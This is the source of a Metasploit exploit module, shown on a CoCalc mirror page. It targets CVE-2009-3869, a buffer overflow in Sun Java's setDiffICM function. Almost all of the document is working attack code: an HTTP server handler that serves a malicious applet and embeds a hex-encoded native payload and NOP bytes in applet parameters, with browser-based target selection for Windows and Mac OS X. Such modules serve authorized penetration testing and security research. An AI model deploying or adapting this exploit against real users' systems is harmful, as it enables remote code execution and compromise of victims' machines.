Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_setdifficm_bof.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',

19
        'Description' => %q{

20
          This module exploits a flaw in the setDiffICM function in the Sun JVM.

21


22
          The payload is serialized and passed to the applet via PARAM tags. It must be

23
          a native payload.

24


25
          The effected Java versions are JDK and JRE 6 Update 16 and earlier,

26
          JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and

27
          earlier, and SDK and JRE 1.3.1_26 and earlier.

28


29
          NOTE: Although all of the above versions are reportedly vulnerable, only

30
          1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

31
        },

32
        'License' => MSF_LICENSE,

33
        'Author' => [

34
          'jduck'

35
        ],

36
        'References' => [

37
          [ 'CVE', '2009-3869' ],

38
          [ 'OSVDB', '59710' ],

39
          [ 'BID', '36881' ],

40
          [ 'ZDI', '09-078' ]

41
        ],

42
        'Payload' => {

43
          'Space' => 1024,

44
          'BadChars' => '',

45
          'DisableNops' => true,

46
        },

47
        'Platform' => %w{win osx},

48
        'Targets' => [

49
=begin

50


51
No automatic targetting for now ...

52


53
          [ 'J2SE 1.6_16 Automatic',

54
            {

55
              'Platform' => %w{ linux osx win },

56
              'Arch' => [ARCH_X86, ARCH_PPC]

57
            }

58
          ],

59
=end

60
          [

61
            'J2SE 1.6_16 on Windows x86',

62
            {

63
              'Platform' => 'win',

64
              'Arch' => ARCH_X86

65
            }

66
          ],

67
          [

68
            'J2SE 1.6_16 on Mac OS X PPC',

69
            {

70
              'Platform' => 'osx',

71
              'Arch' => ARCH_PPC,

72
            }

73
          ],

74
          [

75
            'J2SE 1.6_16 on Mac OS X x86',

76
            {

77
              'Platform' => 'osx',

78
              'Arch' => ARCH_X86,

79
            }

80
          ],

81
        ],

82
        'DefaultTarget' => 0,

83
        'DisclosureDate' => '2009-11-04',

84
        'Notes' => {

85
          'Reliability' => UNKNOWN_RELIABILITY,

86
          'Stability' => UNKNOWN_STABILITY,

87
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

88
        }

89
      )

90
    )

91
  end

92


93
  def on_request_uri(cli, req)

94
    # Create a cached mapping between IP and detected target

95
    @targetcache ||= {}

96
    @targetcache[cli.peerhost] ||= {}

97
    @targetcache[cli.peerhost][:update] = Time.now.to_i

98


99
    if (target.name =~ /Automatic/)

100
      case req.headers['User-Agent']

101
      when /Windows/i

102
        print_status("Choosing a Windows target")

103
        @targetcache[cli.peerhost][:target] = self.targets[1]

104
      when /PPC Mac OS X/i

105
        print_status("Choosing a Mac OS X PPC target")

106
        @targetcache[cli.peerhost][:target] = self.targets[2]

107
      when /Intel Mac OS X/i

108
        print_status("Choosing a Mac OS X x86 target")

109
        @targetcache[cli.peerhost][:target] = self.targets[3]

110
      else

111
        print_status("Unknown target for: #{req.headers['User-Agent']}")

112
      end

113
    end

114


115
    # Clean the cache

116
    rmq = []

117
    @targetcache.each_key do |addr|

118
      if (Time.now.to_i > @targetcache[addr][:update] + 60)

119
        rmq.push addr

120
      end

121
    end

122


123
    rmq.each { |addr| @targetcache.delete(addr) }

124


125
    # Request processing

126
    if (not req.uri.match(/\.jar$/i))

127


128
      # Redirect to the base directory so the applet code loads...

129
      if (not req.uri.match(/\/$/))

130
        print_status("Sending redirect so path ends with / ...")

131
        send_redirect(cli, get_resource() + '/', '')

132
        return

133
      end

134


135
      # Display the applet loading HTML

136
      print_status("Sending HTML")

137
      send_response_html(cli, generate_html(payload.encoded),

138
                         {

139
                           'Content-Type' => 'text/html',

140
                           'Pragma' => 'no-cache'

141
                         })

142
      return

143
    end

144


145
    # Send the actual applet over

146
    print_status("Sending applet")

147
    send_response(cli, generate_applet(cli, req),

148
                  {

149
                    'Content-Type' => 'application/octet-stream',

150
                    'Pragma' => 'no-cache'

151
                  })

152


153
    # Handle the payload

154
    handler(cli)

155
  end

156


157
  def generate_html(pl)

158
    html = <<~EOF

159
      <html>

160
      <head>

161
      <!-- <meta http-equiv=refresh content=10 /> -->

162
      </head>

163
      <body>

164
      <applet width='100%' height='100%' code='AppletX' archive='JARNAME'>

165
      <param name='sc' value='SCODE' />

166
      <param name='np' value='NOPS' />

167
      </applet>

168
      </body>

169
      </html>

170
    EOF

171
    # finalize html

172
    jar_name = rand_text_alphanumeric(32) + ".jar"

173
    html.gsub!(/JARNAME/, jar_name)

174


175
    # put payload into html

176
    debug_payload = false

177
    pload = ""

178
    pload << "\xcc" if debug_payload

179
    pload << pl

180
    if ((pload.length % 4) > 0)

181
      pload << rand_text((4 - (pload.length % 4)))

182
    end

183
    if debug_payload

184
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))

185
    end

186
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

187


188
    # put nops into html

189
    nops = "\x90\x90\x90\x90"

190
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))

191
    # print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

192


193
    return html

194
  end

195


196
  def exploit

197
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2009-3869.jar")

198
    fd = File.open(path, "rb")

199
    @jar_data = fd.read(fd.stat.size)

200
    fd.close

201


202
    super

203
  end

204


205
  def generate_applet(cli, req)

206
    this_target = nil

207
    if (target.name =~ /Automatic/)

208
      if (@targetcache[cli.peerhost][:target])

209
        this_target = @targetcache[cli.peerhost][:target]

210
      else

211
        return ''

212
      end

213
    else

214
      this_target = target

215
    end

216


217
    return @jar_data

218
  end

219
end

220


221